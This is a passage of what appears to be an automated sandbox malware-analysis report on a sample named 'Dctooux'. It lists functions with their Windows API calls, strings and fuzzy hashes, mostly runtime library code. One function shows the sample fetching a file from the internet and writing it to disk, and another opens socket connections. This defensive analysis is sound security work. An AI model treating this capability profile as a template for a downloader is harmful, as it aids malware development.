connect.WS2_32(00000000,?,00000010), ref: 00A5F368
closesocket.WS2_32 ref: 00A5F3BA
Sleep.KERNEL32(000003E8,invalid stoi argument), ref: 00A5F40A

Strings

invalid stoi argument, xrefs: 00A5F3E4
stoi argument out of range, xrefs: 00A5F3DA

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Sleepclosesocketconnectsocket$Startuphtonsinet_pton
String ID: invalid stoi argument$stoi argument out of range
API String ID: 221645565-1606216832
Opcode ID: 13f34d64e603ba6ff53a752c06fc182663f3ab53f794014342610391877c9ee2
Instruction ID: fe1cdd73dcc25d0ef53ec85a9771d2b8a844e0e011c105bfa57ae27d75697625
Opcode Fuzzy Hash: 13f34d64e603ba6ff53a752c06fc182663f3ab53f794014342610391877c9ee2
Instruction Fuzzy Hash: E541E7315403019FE724EBA8DC4ABEA77A8FF85721F00072AFA159B1E1DB70585AC763

Uniqueness

Uniqueness Score: -1.00%

Function 00A73C82 Relevance: 19.7, APIs: 13, Instructions: 223COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 00A73C91

Part of subcall function 00A74F7C: GetVersionExW.KERNEL32(?), ref: 00A74FA0
Part of subcall function 00A74F7C: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 00A7503F

Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00A73CA5
Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00A73CC6
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00A73D2F
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00A73D63

Part of subcall function 00A71C3D: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 00A71C5D

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00A73DE3

Part of subcall function 00A737AC: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00A737C0

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00A73E2B

Part of subcall function 00A71C12: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00A71C2E

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00A73E3F
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00A73E50
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00A73E9D
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00A73EC2
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00A73ECE

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
String ID:
API String ID: 4140532746-0
Opcode ID: b9113095b3b28eddee4540aeddfc14f2c91dea10e6ee7bd6cbb871b3fe53dac2
Instruction ID: b8774af63db351eea1da75a4dbdbe176afa20ea3bc7e4db33ab159531508d0d9
Opcode Fuzzy Hash: b9113095b3b28eddee4540aeddfc14f2c91dea10e6ee7bd6cbb871b3fe53dac2
Instruction Fuzzy Hash: EB81B172A011169FCF18DFADDD915BDB7F9BB48300B26C12ED44AA3651DB349E42EB80

Uniqueness

Uniqueness Score: -1.00%

Function 00A9073F Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00A90783

Part of subcall function 00A9031C: _free.LIBCMT ref: 00A90339
Part of subcall function 00A9031C: _free.LIBCMT ref: 00A9034B
Part of subcall function 00A9031C: _free.LIBCMT ref: 00A9035D
Part of subcall function 00A9031C: _free.LIBCMT ref: 00A9036F
Part of subcall function 00A9031C: _free.LIBCMT ref: 00A90381
Part of subcall function 00A9031C: _free.LIBCMT ref: 00A90393
Part of subcall function 00A9031C: _free.LIBCMT ref: 00A903A5
Part of subcall function 00A9031C: _free.LIBCMT ref: 00A903B7
Part of subcall function 00A9031C: _free.LIBCMT ref: 00A903C9
Part of subcall function 00A9031C: _free.LIBCMT ref: 00A903DB
Part of subcall function 00A9031C: _free.LIBCMT ref: 00A903ED
Part of subcall function 00A9031C: _free.LIBCMT ref: 00A903FF
Part of subcall function 00A9031C: _free.LIBCMT ref: 00A90411

_free.LIBCMT ref: 00A90778

Part of subcall function 00A8C1D5: HeapFree.KERNEL32(00000000,00000000,?,00A904AD,?,00000000,?,8B18EC83,?,00A904D4,?,00000007,?,?,00A908D6,?), ref: 00A8C1EB
Part of subcall function 00A8C1D5: GetLastError.KERNEL32(?,?,00A904AD,?,00000000,?,8B18EC83,?,00A904D4,?,00000007,?,?,00A908D6,?,?), ref: 00A8C1FD

_free.LIBCMT ref: 00A9079A
_free.LIBCMT ref: 00A907AF
_free.LIBCMT ref: 00A907BA
_free.LIBCMT ref: 00A907DC
_free.LIBCMT ref: 00A907EF
_free.LIBCMT ref: 00A907FD
_free.LIBCMT ref: 00A90808
_free.LIBCMT ref: 00A90840
_free.LIBCMT ref: 00A90847
_free.LIBCMT ref: 00A90864
_free.LIBCMT ref: 00A9087C

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 7f2ef2baeb8c2911ebb946fb3c872fc2d014b87841fc398521881fb4bd9ca549
Instruction ID: 40124980a579c423f2459dd167e5dbd11a44a86dac7a5ad8d45c615e8c446931
Opcode Fuzzy Hash: 7f2ef2baeb8c2911ebb946fb3c872fc2d014b87841fc398521881fb4bd9ca549
Instruction Fuzzy Hash: 69316971701605AFEF20AB79D989F5677E8AF003B0F248929F959D7192DE70EC808F60

Uniqueness

Uniqueness Score: -1.00%

Function 00A70EC1 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 60libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,00A75036), ref: 00A70ECF
GetProcAddress.KERNEL32(00000000,SetThreadGroupAffinity), ref: 00A70EDD
GetProcAddress.KERNEL32(00000000,GetThreadGroupAffinity), ref: 00A70EEB
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumberEx), ref: 00A70F19
GetLastError.KERNEL32(?,?,?,00A75036), ref: 00A70F34
GetLastError.KERNEL32(?,?,?,00A75036), ref: 00A70F40
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A70F56

Strings

GetCurrentProcessorNumberEx, xrefs: 00A70F0E
SetThreadGroupAffinity, xrefs: 00A70ED7
GetThreadGroupAffinity, xrefs: 00A70EE3
kernel32.dll, xrefs: 00A70ECA

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
API String ID: 1654681794-465693683
Opcode ID: 116ae180d748255a60e5cd1ef68c3a87b140b94a6c49c2def0152a75495e929d
Instruction ID: 6cc4bd54ed8983d747f61d84541e3715e4251abc6eb0914522900375b6250e6c
Opcode Fuzzy Hash: 116ae180d748255a60e5cd1ef68c3a87b140b94a6c49c2def0152a75495e929d
Instruction Fuzzy Hash: 2D0188B2601312AB9710BBFDDD4AE7776ACB902750711C52AF409D31D2EFB4D811C760

Uniqueness

Uniqueness Score: -1.00%

Function 00A83DBD Relevance: 16.7, APIs: 11, Instructions: 222COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00A83DCF

Part of subcall function 00A8392E: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00A83951

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00A83DF0
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00A83DFD
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00A83E4B
Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00A83EF3
Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00A83F25

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
String ID:
API String ID: 1256429809-0
Opcode ID: 0a934fde7aada50dc620ee42180e8ad44ff11c95f7bf9ee466216d4f5cd4e075
Instruction ID: 197daf94f7b917fef6ae771cd3ca05da0a5f34a2e77023e70735d41d4ce4a579
Opcode Fuzzy Hash: 0a934fde7aada50dc620ee42180e8ad44ff11c95f7bf9ee466216d4f5cd4e075
Instruction Fuzzy Hash: 1E71F232904249AFDF15EF58C980BBEBBB2AF45704F044098FD416B292C736CE16DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A866F5 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 00A867F0
type_info::operator==.LIBVCRUNTIME ref: 00A86817
___TypeMatch.LIBVCRUNTIME ref: 00A86923
IsInExceptionSpec.LIBVCRUNTIME ref: 00A869FE
_UnwindNestedFrames.LIBCMT ref: 00A86A85
CallUnexpected.LIBVCRUNTIME ref: 00A86AA0

Strings

csm, xrefs: 00A8684E
csm, xrefs: 00A86730
csm, xrefs: 00A8679D

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 6f189248b9b340c45389e65b71d1d6855045698403c84663f1dc818891171ea8
Instruction ID: 1026c62018afd0ff4b1ba287b9d45527f22d01b33687895f2839c2c953c4957d
Opcode Fuzzy Hash: 6f189248b9b340c45389e65b71d1d6855045698403c84663f1dc818891171ea8
Instruction Fuzzy Hash: 8EC16D71C00219EFEF29EFA4CA819AEBBB5FF18310F14415AE815AB252D731DA51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A5BCA0 Relevance: 15.2, APIs: 10, Instructions: 238networkfileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,04AA336F,?,00000000), ref: 00A5BD27
InternetOpenA.WININET(00AAA19B,00000000,00000000,00000000,00000000), ref: 00A5BD3D
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00A5BD5D
InternetReadFile.WININET(00000000,00000000,00004000,00004000), ref: 00A5BD6E
WriteFile.KERNEL32(?,00000000,00004000,00000000,00000000,?,00000000), ref: 00A5BD92
InternetReadFile.WININET(00000000,00000000,00004000,00004000), ref: 00A5BD9D
CloseHandle.KERNEL32(?,?,00000000), ref: 00A5BDAA
InternetCloseHandle.WININET(?), ref: 00A5BDB9
InternetCloseHandle.WININET(00000000), ref: 00A5BDBC
RemoveDirectoryA.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00A5BE4B

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Internet$File$CloseHandle$OpenRead$CreateDirectoryRemoveWrite
String ID:
API String ID: 1496009958-0
Opcode ID: d44a1dbe8c1218b4389a818724f4585e2b9bece5c76a6e0a6b2c687f787c7ebc
Instruction ID: ab97f4ff5dd1ce6001b9ef690c109a45510339058a70959a0efcf5557f58c179
Opcode Fuzzy Hash: d44a1dbe8c1218b4389a818724f4585e2b9bece5c76a6e0a6b2c687f787c7ebc
Instruction Fuzzy Hash: 9C719E71A10208AFEB14DFA4CD86BEE7B79FB45702F644218F915AB2D1DB34D948CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A77E2A Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00A77E6F
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00A77EA1
List.LIBCONCRT ref: 00A77EDC
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00A77EED
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00A77F09
List.LIBCONCRT ref: 00A77F44
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00A77F55
Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00A77F70
List.LIBCONCRT ref: 00A77FAB
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00A77FB8

Part of subcall function 00A7732F: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00A77347
Part of subcall function 00A7732F: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00A77359

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 3403738998-0
Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction ID: 70bc2316d4dbc5899a24094084e005e7b4f3a8395bd8fd5d9b0fd634b7945484
Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction Fuzzy Hash: BF514171A00219AFDB14DF64C995FEDB3A8FF48344F45C4A9E919AB242D730AE45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A8B939 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00A8B94F

Part of subcall function 00A8C1D5: HeapFree.KERNEL32(00000000,00000000,?,00A904AD,?,00000000,?,8B18EC83,?,00A904D4,?,00000007,?,?,00A908D6,?), ref: 00A8C1EB
Part of subcall function 00A8C1D5: GetLastError.KERNEL32(?,?,00A904AD,?,00000000,?,8B18EC83,?,00A904D4,?,00000007,?,?,00A908D6,?,?), ref: 00A8C1FD

_free.LIBCMT ref: 00A8B95B
_free.LIBCMT ref: 00A8B966
_free.LIBCMT ref: 00A8B971
_free.LIBCMT ref: 00A8B97C
_free.LIBCMT ref: 00A8B987
_free.LIBCMT ref: 00A8B992
_free.LIBCMT ref: 00A8B99D
_free.LIBCMT ref: 00A8B9A8
_free.LIBCMT ref: 00A8B9B6

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 42f0df7d31b97944cc819547aa12009bcd61fe0ae2a8507b025a62ab27fb78a3
Instruction ID: 93d961d300356274560b4eb71334ba75d052eb507db6868e0d4fbde0aa66232e
Opcode Fuzzy Hash: 42f0df7d31b97944cc819547aa12009bcd61fe0ae2a8507b025a62ab27fb78a3
Instruction Fuzzy Hash: 7A21A7B695110CAFCB05EF94C985DDD7FB8AF08360B0041A5FA159B162DB31EA448F90

Uniqueness

Uniqueness Score: -1.00%

Function 00A787B4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 80threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00A78800
SwitchToThread.KERNEL32(?), ref: 00A78823
Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00A78842
Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 00A7885E
Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00A78869
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A78890

Strings

count, xrefs: 00A787CE
ppVirtualProcessorRoots, xrefs: 00A78888

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementSwitchThreadstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 3791123369-3650809737
Opcode ID: 1fbbb1506ea07b93fa525f77d099cbc25bee04e340cedef70c58dade4a9172a4
Instruction ID: e9e0210490786024f0e1384cd3dd0229f9009ecd64f9c9cc2400b2652f86989a
Opcode Fuzzy Hash: 1fbbb1506ea07b93fa525f77d099cbc25bee04e340cedef70c58dade4a9172a4
Instruction Fuzzy Hash: 78218534E00209AFCF04EF99C999AAD77B5BF59340F54C0A9E40997251DB34AE05CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A7826C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00A78286
GetCurrentProcess.KERNEL32 ref: 00A7828E
DuplicateHandle.KERNEL32(00000000,000000FF,00000000,00000000,00000000,00000000,00000002), ref: 00A782A3
SafeRWList.LIBCONCRT ref: 00A782C3

Part of subcall function 00A762BE: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00A762CF
Part of subcall function 00A762BE: List.LIBCMT ref: 00A762D9

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A782D5
GetLastError.KERNEL32 ref: 00A782E4
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A782FA

Strings

eventObject, xrefs: 00A782CD

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorHandleLastLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 165577817-1680012138
Opcode ID: ea4503cbcd01261c898ea2bc3e0b79335a4373cbc5797ca09c8ef1d748d85274
Instruction ID: 7d560bd8f46e6017c681361892ffa6594c31a68f6c3a9620fbdea56871aa73fa
Opcode Fuzzy Hash: ea4503cbcd01261c898ea2bc3e0b79335a4373cbc5797ca09c8ef1d748d85274
Instruction Fuzzy Hash: CA11E032540205EBCB10EBA4CD4EFEE3378AB04751F20C115B51AA60D2EF749A45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A96AB2 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 232689d369015db80b83fc03fd77a22ea5dd55a0cf96c46c79f9a936d69e85aa
Instruction ID: c01b89a757a1074ea968c257526915525c1bff5c51234938fc590d184b7a575e
Opcode Fuzzy Hash: 232689d369015db80b83fc03fd77a22ea5dd55a0cf96c46c79f9a936d69e85aa
Instruction Fuzzy Hash: D9C11FB4F04646AFDF15DFA8C980BBDBBF1AF49310F144158E424AB2A2DB749D42CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A78D31 Relevance: 13.6, APIs: 9, Instructions: 106timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00A78D53

Part of subcall function 00A77108: __EH_prolog3_catch.LIBCMT ref: 00A7710F
Part of subcall function 00A77108: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00A77148

Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 00A78D61

